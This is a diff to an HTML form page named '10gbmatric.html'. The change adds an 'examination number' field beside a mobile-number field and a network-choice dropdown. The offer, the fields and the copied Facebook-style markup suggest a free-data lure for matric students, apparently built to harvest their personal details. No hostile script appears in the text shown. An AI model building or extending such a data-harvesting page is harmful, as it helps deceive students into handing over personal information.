--- a/10gbmatric.html
+++ b/10gbmatric.html
@@ -143,11 +143,13 @@
             <div id="num">0%</div>
         </div>
         <div id="info">
-            <p class="title"> ENTER YOUR MOBILE NUMBER:</p>
+            
             <div class="phone">
-                <center><input type="char" placeholder="mobile no" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
+                <center><input type="char" placeholder="mobile number" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
               
-
+<br/>
+		    <center><input type="char" placeholder="examination number" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
+              <br/>
               <center>
 <center><p class="title">CHOOSE YOUR NETWORK</p></center>
 <select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
